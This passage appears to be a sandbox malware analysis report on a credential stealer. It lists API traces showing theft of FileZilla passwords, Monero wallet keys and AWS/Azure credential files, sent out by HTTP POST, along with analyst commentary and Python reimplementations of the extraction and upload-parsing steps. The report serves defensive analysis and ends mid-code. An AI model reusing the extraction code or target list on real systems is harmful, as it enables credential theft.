                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 19bf1258227d7fe0f37725954ea88e1950e8fbfa04c7889fd6182c23a55d67b3
                                  • Instruction ID: e6c288d4bef0bc12255ee830b17e29643b8b8599446b4f4abbc7c18a3e16c470
                                  • Opcode Fuzzy Hash: 19bf1258227d7fe0f37725954ea88e1950e8fbfa04c7889fd6182c23a55d67b3
                                  • Instruction Fuzzy Hash: 19D13F71900108ABDB04FBF4DD96DEE7738BF54301F448529F116A7085EE38AA46EB63
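The function above is the FileZilla collector: its strings name `\AppData\Roaming\FileZilla\recentservers.xml` and the `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` elements, and the lstrcat chain assembles one record per saved server from the literals `browser: FileZilla`, `profile: null`, `url: `, `login: ` and `password: `. The following is an added example, not code from the report or from the sample: a Python reimplementation of that extraction over a constructed recentservers.xml, so an analyst can see exactly what such a record contains. Assumptions: the XML is constructed; the separators held in the unresolved literals (00F81678, 00F8167C, 00F81688, 00F81698, 00F8169C) are not visible in the trace and are taken to be `:` between host and port and newlines elsewhere; a server entry with no saved password is taken to yield an empty password field.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the layout FileZilla uses for recentservers.xml
# (the real file lives at %APPDATA%\FileZilla\recentservers.xml). The
# password is stored base64-encoded, not encrypted, unless a master
# password is configured.
SAMPLE_RECENTSERVERS_XML = """<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_recentservers(xml_text):
    """Return a list of (host, port, user, password) tuples.

    Mirrors what the API trace shows: the routine looks for <Host>,
    <Port>, <User> and <Pass encoding="base64"> and decodes the password.
    A server with no <Pass> element yields an empty string (assumption).
    """
    root = ET.fromstring(xml_text)
    entries = []
    for server in root.iter("Server"):
        host = server.findtext("Host", default="")
        port = server.findtext("Port", default="")
        user = server.findtext("User", default="")
        pass_el = server.find("Pass")
        password = ""
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                # Other encodings (e.g. "crypt" with a master password) are
                # left as-is; the trace only shows base64 handling.
                password = pass_el.text
        entries.append((host, port, user, password))
    return entries


def format_record(entry):
    """Rebuild the record the lstrcat chain assembles.

    Field order follows the trace: browser, profile, url, login, password.
    The ':' between host and port and the newlines are assumptions.
    """
    host, port, user, password = entry
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {host}:{port}\n"
        f"login: {user}\n"
        f"password: {password}\n"
    )


if __name__ == "__main__":
    for entry in parse_recentservers(SAMPLE_RECENTSERVERS_XML):
        print(format_record(entry))
```

Practitioner note: unless a master password is configured, FileZilla keeps the saved password base64-encoded rather than encrypted, so any process running as the user can recover it; a read of `recentservers.xml` (or `sitemanager.xml`) by a process other than filezilla.exe is a cheap and reliable hunting signal for this collector.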
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F659F8
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F65A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F65B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,016FE5D0,00000000,?,016F9CC8,00000000,?,00F81A1C), ref: 00F65E71
                                  • lstrlen.KERNEL32(00000000), ref: 00F65E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00F65E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F65E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00F65EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00F65ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F65EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00F65F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F65F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F65F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00F65FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00F65FBD
                                  • HttpOpenRequestA.WININET(00000000,016FE490,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F65BF8
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00F65FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: bb3bbaa09b62f6c71e2c752e0f2b39c146493976584d1a365d2d9cd6ecccf18b
                                  • Instruction ID: e2a403b29db65e65e4b9551dd787d3d8ea3b4b357c49b603e8cc66aedadbcc29
                                  • Opcode Fuzzy Hash: bb3bbaa09b62f6c71e2c752e0f2b39c146493976584d1a365d2d9cd6ecccf18b
                                  • Instruction Fuzzy Hash: 46121271820118ABDB19EBA0DC95FEE7378BF54700F41816AF11A63091EF746A4ADF53
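The function above is the network send: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), HttpSendRequestA, and then InternetReadFile in 0xC7-byte (199-byte) reads of the reply. The only body literals the trace exposes are `"` and runs of `------`, which is what a hand-assembled multipart/form-data body looks like. The following is an added example, not code from the report or from the sample: a Python parser that splits a captured POST body of that shape back into its fields, the first step when reconstructing from a packet capture what was sent. The sample body, the boundary value and the field names are constructed for the example; the trace does not reveal the real ones.

```python
import re

# Constructed capture of a multipart/form-data POST body. The boundary and
# the field names are assumptions for the example; the trace only shows
# that the body is built from '"' and '------' literals.
ASSUMED_BOUNDARY = b"------ExampleBoundary7d3"
SAMPLE_BODY = (
    b"--" + ASSUMED_BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="token"\r\n\r\n'
    b"a1b2c3\r\n"
    b"--" + ASSUMED_BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="file"; filename="system.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"browser: FileZilla\r\nprofile: null\r\n"
    b"--" + ASSUMED_BOUNDARY + b"--\r\n"
)


def content_type_boundary(content_type):
    """Pull the boundary out of a Content-Type header value (quoted or bare)."""
    m = re.search(r'boundary=(?:"([^"]+)"|([^;\s]+))', content_type)
    if not m:
        raise ValueError("no boundary in Content-Type")
    return (m.group(1) or m.group(2)).encode()


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into its parts.

    Returns a list of dicts with keys name, filename, headers and data
    (bytes). Raises ValueError on a part that is not delimiter + CRLF +
    headers + blank line, so a truncated capture is reported rather than
    silently yielding garbage.
    """
    delimiter = b"--" + boundary
    parts = []
    # chunks[0] is the preamble (empty when the body starts with the delimiter).
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter: "--boundary--"
        if not chunk.startswith(b"\r\n"):
            raise ValueError("malformed part: delimiter not followed by CRLF")
        head, sep, data = chunk[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("malformed part: missing header terminator")
        # The CRLF preceding the next delimiter belongs to the delimiter, not to the data.
        if data.endswith(b"\r\n"):
            data = data[:-2]
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.partition(b":")
            headers[key.strip().lower().decode("ascii", "replace")] = value.strip().decode("ascii", "replace")
        disposition = headers.get("content-disposition", "")
        # Negative lookbehind keeps 'filename="..."' from being taken as the name.
        name = re.search(r'(?<!file)name="([^"]*)"', disposition)
        filename = re.search(r'filename="([^"]*)"', disposition)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": filename.group(1) if filename else None,
            "headers": headers,
            "data": data,
        })
    return parts


if __name__ == "__main__":
    for part in parse_multipart(SAMPLE_BODY, ASSUMED_BOUNDARY):
        print(part["name"], part["filename"], len(part["data"]), "bytes")
```

When working from a real capture, take the boundary from the request's Content-Type header with `content_type_boundary()` rather than guessing it, and keep the part data as bytes: the file parts of a stealer upload are often ZIP or SQLite blobs, not text.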
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F6D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F6D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D208
                                  • lstrcat.KERNEL32(?,00F81478), ref: 00F6D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D22A
                                  • lstrcat.KERNEL32(?,00F8147C), ref: 00F6D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D24C
                                  • lstrcat.KERNEL32(?,00F81480), ref: 00F6D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D26E
                                  • lstrcat.KERNEL32(?,00F81484), ref: 00F6D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D290
                                  • lstrcat.KERNEL32(?,00F81488), ref: 00F6D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D2B2
                                  • lstrcat.KERNEL32(?,00F8148C), ref: 00F6D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D2D4
                                  • lstrcat.KERNEL32(?,00F81490), ref: 00F6D2E3
                                    • Part of subcall function 00F7A820: lstrlen.KERNEL32(00F64F05,?,?,00F64F05,00F80DDE), ref: 00F7A82B
                                    • Part of subcall function 00F7A820: lstrcpy.KERNEL32(00F80DDE,00000000), ref: 00F7A885
                                  • lstrlen.KERNEL32(?), ref: 00F6D32A
                                  • lstrlen.KERNEL32(?), ref: 00F6D339
                                    • Part of subcall function 00F7AA70: StrCmpCA.SHLWAPI(016F8960,00F6A7A7,?,00F6A7A7,016F8960), ref: 00F7AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 5d4833aca9ad367bd5f318623930eb267297f70a7487fc6c6a1e9f3d7d55c8fb
                                  • Instruction ID: a16fbbf1999c942be559bf43548cd4c92fe149985d88fb15fd7daa931c4a01aa
                                  • Opcode Fuzzy Hash: 5d4833aca9ad367bd5f318623930eb267297f70a7487fc6c6a1e9f3d7d55c8fb
                                  • Instruction Fuzzy Hash: ABE174719001089BDB18FBA0DD96EEE7778BF94301F418125F11BA3095DE38AE56EB63
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,016FCF90,00000000,?,00F8144C,00000000,?,?), ref: 00F6CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F6CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00F6CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F6CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F6CAD9
                                  • StrStrA.SHLWAPI(?,016FCEA0,00F80B52), ref: 00F6CAF7
                                  • StrStrA.SHLWAPI(00000000,016FCFA8), ref: 00F6CB1E
                                  • StrStrA.SHLWAPI(?,016FD1F8,00000000,?,00F81458,00000000,?,00000000,00000000,?,016F88F0,00000000,?,00F81454,00000000,?), ref: 00F6CCA2
                                  • StrStrA.SHLWAPI(00000000,016FD018), ref: 00F6CCB9
                                    • Part of subcall function 00F6C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F6C871
                                    • Part of subcall function 00F6C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F6C87C
                                  • StrStrA.SHLWAPI(?,016FD018,00000000,?,00F8145C,00000000,?,00000000,016F8980), ref: 00F6CD5A
                                  • StrStrA.SHLWAPI(00000000,016F8AA0), ref: 00F6CD71
                                    • Part of subcall function 00F6C820: lstrcat.KERNEL32(?,00F80B46), ref: 00F6C943
                                    • Part of subcall function 00F6C820: lstrcat.KERNEL32(?,00F80B47), ref: 00F6C957
                                    • Part of subcall function 00F6C820: lstrcat.KERNEL32(?,00F80B4E), ref: 00F6C978
                                  • lstrlen.KERNEL32(00000000), ref: 00F6CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00F6CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 819cd6afdd6cc7403a234f5fd884eebe779e8171459183016cc9605a6e9830dd
                                  • Instruction ID: e8395a18bce401a2c358b96495480fcc186495913139f6be8c1e4082bc5d7f28
                                  • Opcode Fuzzy Hash: 819cd6afdd6cc7403a234f5fd884eebe779e8171459183016cc9605a6e9830dd
                                  • Instruction Fuzzy Hash: 1FE11571D00108ABDB19EBA0DC91FEEB778AF54300F41816AF11A67191EF346A4ADF63
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,016FAB60,00000000,00020019,00000000,00F805B6), ref: 00F783A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F78426
                                  • wsprintfA.USER32 ref: 00F78459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F7847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F7848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F78499
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 52091197a8eb0e95539ab629a357cfbf102c8dd9aac2e81d91ce0bfbd391d42a
                                  • Instruction ID: e929bec10027f07f450b54c6c7175bf0aa82d59e31df49a4de822361608a9e04
                                  • Opcode Fuzzy Hash: 52091197a8eb0e95539ab629a357cfbf102c8dd9aac2e81d91ce0bfbd391d42a
                                  • Instruction Fuzzy Hash: 1F814F71910118ABDB68DB54DC85FEE77B8BF48700F40C299E10AA6180DF756F86DF92
                                  APIs
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00F74DCD
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F7492C
                                    • Part of subcall function 00F74910: FindFirstFileA.KERNEL32(?,?), ref: 00F74943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00F74E59
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FDC), ref: 00F74971
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FE0), ref: 00F74987
                                    • Part of subcall function 00F74910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F74B7D
                                    • Part of subcall function 00F74910: FindClose.KERNEL32(000000FF), ref: 00F74B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F74EE5
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F749B0
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F808D2), ref: 00F749C5
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F749E2
                                    • Part of subcall function 00F74910: PathMatchSpecA.SHLWAPI(?,?), ref: 00F74A1E
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,016FE550), ref: 00F74A4A
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,00F80FF8), ref: 00F74A5C
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,?), ref: 00F74A70
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,00F80FFC), ref: 00F74A82
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,?), ref: 00F74A96
                                    • Part of subcall function 00F74910: CopyFileA.KERNEL32(?,?,00000001), ref: 00F74AAC
                                    • Part of subcall function 00F74910: DeleteFileA.KERNEL32(?), ref: 00F74B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 5d15b3e616821a7676ca7c4e8f1ed4aa2fd8f1c964ac6684310c1c2beccd204a
                                  • Instruction ID: bc57c8ccb65a400a5e8b92fe5efe38b8d2fc55e17fae519a9d0f2c4843be46a0
                                  • Opcode Fuzzy Hash: 5d15b3e616821a7676ca7c4e8f1ed4aa2fd8f1c964ac6684310c1c2beccd204a
                                  • Instruction Fuzzy Hash: 4441B37A94020466DB64F770EC47FDD7638AB64700F408565B289660C1EEB89BC9AB93
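The function above is the cloud-credential collector: it appends `\.azure\`, `\.aws\` and `\.IdentityService\` to a folder obtained through SHGetFolderPathA, walks each with FindFirstFileA/FindNextFileA (skipping the two names compared with StrCmpCA, presumably `.` and `..`), filters the entries with PathMatchSpecA against the patterns `*.*` and `msal.cache`, and copies the matches into staging subfolders named `Azure\.azure`, `Azure\.aws` and `Azure\.IdentityService` (the DeleteFileA in the helper is the cleanup of a staged copy). The following is an added example, not code from the report or from the sample: a Python re-creation of that file selection, so a responder can list what the routine would have taken from a given profile directory. The base directory is a parameter because the CSIDL used for each call is not visible in the trace; the 0x1C seen in the helper is CSIDL_LOCAL_APPDATA, but `.aws` and `.azure` normally live under the user profile. The directory tree built by `demo()` is constructed test data.

```python
import fnmatch
import os
import tempfile

# (subdirectory appended to the base folder, pattern handed to
# PathMatchSpecA, staging subfolder name) as the routine's strings show.
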